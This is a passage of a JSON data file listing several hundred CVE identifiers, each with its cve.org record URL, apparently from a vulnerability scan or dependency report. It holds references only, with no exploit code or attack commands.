"url": "https://www.cve.org/CVERecord?id=CVE-2020-13955"
},
{
"name": "CVE-2018-14718",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14718"
},
{
"name": "CVE-2020-10650",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10650"
},
{
"name": "CVE-2025-21584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21584"
},
{
"name": "CVE-2025-66516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66516"
},
{
"name": "CVE-2025-15367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
},
{
"name": "CVE-2016-1000346",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000346"
},
{
"name": "CVE-2020-36186",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36186"
},
{
"name": "CVE-2020-36189",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36189"
},
{
"name": "CVE-2025-9820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9820"
},
{
"name": "CVE-2026-2006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2006"
},
{
"name": "CVE-2020-35490",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35490"
},
{
"name": "CVE-2026-35236",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35236"
},
{
"name": "CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"name": "CVE-2020-13936",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13936"
},
{
"name": "CVE-2025-50085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50085"
},
{
"name": "CVE-2021-20190",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20190"
},
{
"name": "CVE-2021-35516",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35516"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2018-19360",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19360"
},
{
"name": "CVE-2023-33202",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33202"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2026-5121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2026-35237",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35237"
},
{
"name": "CVE-2014-0114",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-0114"
},
{
"name": "CVE-2026-33236",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33236"
},
{
"name": "CVE-2022-32287",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32287"
},
{
"name": "CVE-2026-2005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2005"
},
{
"name": "CVE-2019-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16335"
},
{
"name": "CVE-2016-1000345",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000345"
},
{
"name": "CVE-2026-24051",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24051"
},
{
"name": "CVE-2022-39135",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39135"
},
{
"name": "CVE-2025-33042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33042"
},
{
"name": "CVE-2026-34073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34073"
},
{
"name": "CVE-2026-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27144"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2026-22017",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22017"
},
{
"name": "CVE-2022-26336",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26336"
},
{
"name": "CVE-2024-21244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21244"
},
{
"name": "CVE-2026-32283",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32283"
},
{
"name": "CVE-2025-30683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30683"
},
{
"name": "CVE-2025-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30699"
},
{
"name": "CVE-2019-14893",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14893"
},
{
"name": "CVE-2018-1338",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1338"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2023-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50298"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2021-29262",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29262"
},
{
"name": "CVE-2020-11113",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11113"
},
{
"name": "CVE-2024-21503",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21503"
},
{
"name": "CVE-2016-1000338",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000338"
},
{
"name": "CVE-2026-0861",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0861"
},
{
"name": "CVE-2026-1703",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1703"
},
{
"name": "CVE-2026-25645",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
},
{
"name": "CVE-2026-21860",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21860"
},
{
"name": "CVE-2026-3479",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
},
{
"name": "CVE-2024-52012",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52012"
},
{
"name": "CVE-2021-35517",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35517"
},
{
"name": "CVE-2025-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50098"
},
{
"name": "CVE-2026-39883",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39883"
},
{
"name": "CVE-2026-4424",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4424"
},
{
"name": "CVE-2019-10088",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10088"
},
{
"name": "CVE-2025-50086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50086"
},
{
"name": "CVE-2026-32281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32281"
},
{
"name": "CVE-2026-1839",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1839"
},
{
"name": "CVE-2026-27142",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27142"
},
{
"name": "CVE-2026-34515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34515"
},
{
"name": "CVE-2026-5598",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5598"
},
{
"name": "CVE-2026-34519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34519"
},
{
"name": "CVE-2018-11797",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11797"
},
{
"name": "CVE-2026-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22022"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2026-34304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34304"
},
{
"name": "CVE-2025-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50082"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2025-50097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50097"
},
{
"name": "CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2020-10672",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10672"
},
{
"name": "CVE-2024-21742",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21742"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2025-50084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50084"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-50079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50079"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2019-14439",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14439"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2021-37533",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37533"
},
{
"name": "CVE-2025-21574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21574"
},
{
"name": "CVE-2018-8017",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-8017"
},
{
"name": "CVE-2020-10969",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10969"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2026-21948",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21948"
},
{
"name": "CVE-2025-11143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11143"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2025-21580",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21580"
},
{
"name": "CVE-2026-34986",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
},
{
"name": "CVE-2025-53023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53023"
},
{
"name": "CVE-2025-21575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21575"
},
{
"name": "CVE-2020-36187",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36187"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2017-15691",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15691"
},
{
"name": "CVE-2024-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21634"
},
{
"name": "CVE-2025-21577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21577"
},
{
"name": "CVE-2022-38749",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38749"
},
{
"name": "CVE-2026-22002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22002"
},
{
"name": "CVE-2021-36090",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36090"
},
{
"name": "CVE-2026-34518",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34518"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2016-1000342",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000342"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2018-17197",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-17197"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2025-62813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62813"
},
{
"name": "CVE-2020-11620",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11620"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2026-34308",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34308"
},
{
"name": "CVE-2016-1000339",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000339"
},
{
"name": "CVE-2018-12022",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12022"
},
{
"name": "CVE-2026-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3219"
},
{
"name": "CVE-2025-50096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50096"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2023-50291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50291"
},
{
"name": "CVE-2018-5968",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5968"
},
{
"name": "CVE-2025-61732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61732"
},
{
"name": "CVE-2025-21499",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21499"
},
{
"name": "CVE-2023-45803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2026-27199",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27199"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2020-1945",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-1945"
},
{
"name": "CVE-2025-30705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30705"
},
{
"name": "CVE-2021-23926",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23926"
},
{
"name": "CVE-2026-21964",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21964"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-50088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50088"
},
{
"name": "CVE-2026-22731",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22731"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2025-68146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68146"
},
{
"name": "CVE-2020-24750",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-24750"
},
{
"name": "CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2025-3730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3730"
},
{
"name": "CVE-2025-13836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13836"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2026-34525",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34525"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2026-22732",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22732"
},
{
"name": "CVE-2025-50077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50077"
},
{
"name": "CVE-2020-9492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9492"
},
{
"name": "CVE-2025-54988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
},
{
"name": "CVE-2026-32274",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32274"
},
{
"name": "CVE-2026-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40192"
},
{
"name": "CVE-2026-35240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35240"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2026-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22004"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2018-1324",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1324"
},
{
"name": "CVE-2025-10158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10158"
},
{
"name": "CVE-2025-50092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50092"
},
{
"name": "CVE-2025-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50099"
},
{
"name": "CVE-2026-22001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22001"
},
{
"name": "CVE-2026-32874",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32874"
},
{
"name": "CVE-2025-3263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3263"
},
{
"name": "CVE-2025-12818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12818"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2026-4539",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4539"
},
{
"name": "CVE-2019-16943",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16943"
},
{
"name": "CVE-2021-31812",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31812"
},
{
"name": "CVE-2026-4519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4519"
},
{
"name": "CVE-2025-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
},
{
"name": "CVE-2025-13462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
},
{
"name": "CVE-2025-30684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30684"
},
{
"name": "CVE-2026-32289",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32289"
},
{
"name": "CVE-2026-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0865"
},
{
"name": "CVE-2021-37404",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37404"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2025-66221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66221"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2025-6051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6051"
},
{
"name": "CVE-2026-4111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4111"
},
{
"name": "CVE-2025-50093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50093"
},
{
"name": "CVE-2025-53069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53069"
},
{
"name": "CVE-2024-28085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28085"
},
{
"name": "CVE-2025-66034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66034"
},
{
"name": "CVE-2019-20330",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20330"
},
{
"name": "CVE-2020-14195",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14195"
},
{
"name": "CVE-2025-21579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21579"
},
{
"name": "CVE-2018-10237",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10237"
},
{
"name": "CVE-2019-12814",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12814"
},
{
"name": "CVE-2020-35491",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35491"
},
{
"name": "CVE-2019-17531",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17531"
},
{
"name": "CVE-2025-53044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53044"
},
{
"name": "CVE-2026-3298",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3298"
},
{
"name": "CVE-2026-6100",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6100"
},
{
"name": "CVE-2026-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21968"
},
{
"name": "CVE-2026-32280",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
},
{
"name": "CVE-2025-50087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50087"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2024-21232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21232"
},
{
"name": "CVE-2020-14061",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14061"
},
{
"name": "CVE-2024-9823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9823"
},
{
"name": "CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"name": "CVE-2022-42004",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42004"
},
{
"name": "CVE-2026-4224",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
},
{
"name": "CVE-2021-22569",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22569"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2020-11619",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11619"
},
{
"name": "CVE-2019-12415",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12415"
},
{
"name": "CVE-2025-8869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8869"
},
{
"name": "CVE-2020-36183",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36183"
},
{
"name": "CVE-2026-25854",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25854"
},
{
"name": "CVE-2026-22015",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22015"
},
{
"name": "CVE-2025-12817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12817"
},
{
"name": "CVE-2021-22573",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22573"
},
{
"name": "CVE-2026-23949",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23949"
},
{
"name": "CVE-2020-8840",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8840"
},
{
"name": "CVE-2026-1519",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1519"
},
{
"name": "CVE-2026-2332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
},
{
"name": "CVE-2025-31672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31672"
},
{
"name": "CVE-2018-11761",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11761"
},
{
"name": "CVE-2025-30721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30721"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2018-11771",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11771"
},
{
"name": "CVE-2025-50091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50091"
},
{
"name": "CVE-2018-1335",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1335"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2026-0915",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0915"
},
{
"name": "CVE-2025-15281",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15281"
},
{
"name": "CVE-2025-21493",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21493"
},
{
"name": "CVE-2022-41854",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41854"
},
{
"name": "CVE-2018-11762",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11762"
},
{
"name": "CVE-2020-8908",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8908"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2026-22733",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22733"
},
{
"name": "CVE-2026-2297",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
},
{
"name": "CVE-2025-58181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
},
{
"name": "CVE-2025-53054",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53054"
},
{
"name": "CVE-2020-36184",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36184"
},
{
"name": "CVE-2025-47914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
},
{
"name": "CVE-2026-22005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22005"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2016-1000340",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000340"
},
{
"name": "CVE-2026-34516",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34516"
},
{
"name": "CVE-2026-1299",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
},
{
"name": "CVE-2020-36180",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36180"
},
{
"name": "CVE-2018-12023",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12023"
},
{
"name": "CVE-2026-3644",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
},
{
"name": "CVE-2026-27140",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27140"
},
{
"name": "CVE-2022-25857",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25857"
},
{
"name": "CVE-2022-38751",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38751"
},
{
"name": "CVE-2025-50104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50104"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2018-14720",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14720"
},
{
"name": "CVE-2020-36518",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36518"
},
{
"name": "CVE-2026-29129",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29129"
},
{
"name": "CVE-2022-31159",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31159"
},
{
"name": "CVE-2026-22735",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22735"
},
{
"name": "CVE-2026-34517",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34517"
},
{
"name": "CVE-2025-30687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30687"
},
{
"name": "CVE-2020-15522",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15522"
},
{
"name": "CVE-2025-50101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50101"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2018-1339",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1339"
},
{
"name": "CVE-2016-1000352",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000352"
},
{
"name": "CVE-2026-27139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27139"
},
{
"name": "CVE-2025-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4207"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2025-14009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14009"
},
{
"name": "CVE-2025-53040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53040"
},
{
"name": "CVE-2017-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15095"
},
{
"name": "CVE-2019-14540",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14540"
},
{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2019-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12086"
},
{
"name": "CVE-2026-24049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24049"
},
{
"name": "CVE-2018-14721",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14721"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2026-33810",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33810"
},
{
"name": "CVE-2022-38752",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38752"
},
{
"name": "CVE-2026-34278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34278"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2026-34513",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34513"
},
{
"name": "CVE-2023-24998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24998"
},
{
"name": "CVE-2026-2003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2003"
},
{
"name": "CVE-2025-30704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30704"
},
{
"name": "CVE-2022-38750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38750"
},
{
